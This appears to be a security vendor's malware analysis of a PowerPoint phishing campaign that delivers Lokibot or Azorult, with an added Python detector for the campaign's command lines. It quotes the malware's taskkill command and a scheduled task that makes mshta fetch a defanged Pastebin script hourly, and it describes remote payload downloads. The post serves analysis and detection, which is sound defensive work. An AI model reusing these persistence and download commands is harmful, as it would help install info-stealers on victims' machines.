A malware campaign using PowerPoint as the infection vector caught our eye after we noticed it contained lyrics to a popular Drake song hidden inside a PowerShell command. Depending on the victim, it dropped either the Lokibot info stealer or the Azorult remote access trojan. The infection chain starts with a simple email, such as the example pictured below.
Upon opening either of the PowerPoint attachments, a heavily obfuscated Visual Basic script runs automatically.
This script uses the Microsoft HTML Application Host (mshta.exe) to reach out to a Bitly shortened link (hxxp://j.mp/*) in an attempt to circumvent browser defense controls. It then uses the command line to kill Excel and Word with taskkill, if they are running.
"C:\Windows\System32\cmd.exe" /c taskkill /f /im excel.exe & taskkill /f /im winword.exe
After that, it creates a scheduled task for mshta to reach out to a Pastebin URL every 60 minutes. An encoded script is hosted at that URL, and which URL the task retrieves dictates whether the recipient ultimately receives the Lokibot or the Azorult payload in our samples.
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 60 /tn (+main+) /tr "mshta hxxp:\\pastebin[.]com\raw\C5qNg3Dr" /F
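The two command lines above can be matched in process-creation logs. The following is an added example, not code from the original post: the rule names, the `triage` and `parse_switches` functions, and every sample line after the first two are constructed for illustration.

```python
import re

# Remote URL argument. Tolerates defanged text (hxxp, [.]) and the backslash
# form ("http:\\host\path") used in the scheduled task quoted on this page.
URL = re.compile(r"h(?:tt|xx)ps?:(?://|\\\\)([\w\-\[\].]+)", re.I)
SWITCH = re.compile(r'(?<!\S)/(\w+)(?:\s+(?!/)("[^"]*"|\S+))?')
MSHTA = re.compile(r"\bmshta(?:\.exe)?\b", re.I)
SCHTASKS = re.compile(r"\bschtasks(?:\.exe)?\b", re.I)
OFFICE_KILL = re.compile(
    r"\btaskkill(?:\.exe)?\b.*?/im\s+\"?(?:excel|winword)\.exe", re.I)


def parse_switches(cmdline):
    """Map /switch [value] pairs to a dict with lower-cased switch names."""
    return {m.group(1).lower(): (m.group(2) or "").strip('"')
            for m in SWITCH.finditer(cmdline)}


def triage(cmdline):
    """Return (rule, detail...) findings for one process command line."""
    findings = []
    if SCHTASKS.search(cmdline):
        sw = parse_switches(cmdline)
        action = sw.get("tr", "")            # what the task will execute
        url = URL.search(action)
        if "create" in sw and MSHTA.search(action) and url:
            every = "%s %s" % (sw.get("mo", "1"), sw.get("sc", "?"))
            findings.append(("schtasks_mshta_url", url.group(1), every))
    elif MSHTA.search(cmdline) and URL.search(cmdline):
        findings.append(("mshta_remote_url", URL.search(cmdline).group(1)))
    if OFFICE_KILL.search(cmdline):
        findings.append(("taskkill_office",))
    return findings


# The first two lines are the commands quoted on this page; the rest are constructed.
SAMPLES = [
    r'"C:\Windows\System32\cmd.exe" /c taskkill /f /im excel.exe & taskkill /f /im winword.exe',
    r'"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 60 /tn (+main+) /tr "mshta hxxp:\\pastebin[.]com\raw\C5qNg3Dr" /F',
    r'mshta.exe hxxp://j.mp/EXAMPLE',
    r'schtasks.exe /create /sc DAILY /tn "Backup" /tr "C:\Tools\backup.cmd"',
    r'mshta.exe "C:\Program Files\App\help.hta"',
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(triage(line) or "clean", "<-", line)
```

The URL pattern accepts backslashes after the scheme because the scheduled task on this page is written that way, and a rule that only looks for `://` would miss it.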
Once decoded, this translates into a PowerShell script that contains a reference to Drake's "Keke Do You Love Me" lyrics. The attacker, "Master X" (a name retrieved from the metadata inside the PowerPoint), had a sense of humor when he was creating the Invoke-Expression cmdlet call. "Master X" also obfuscated the 'DownloadString' call inside the PowerShell script below in another attempt to avoid defense solutions that monitor PowerShell activity.
This script reaches out to paste.ee and downloads a malicious executable named calc.exe. We can see the file header of the retrieved malicious executable when loading the paste.ee site.
Sanitized Indicators of Compromise:
Dropped executable file
Main object - "Purchase Order A6.pps"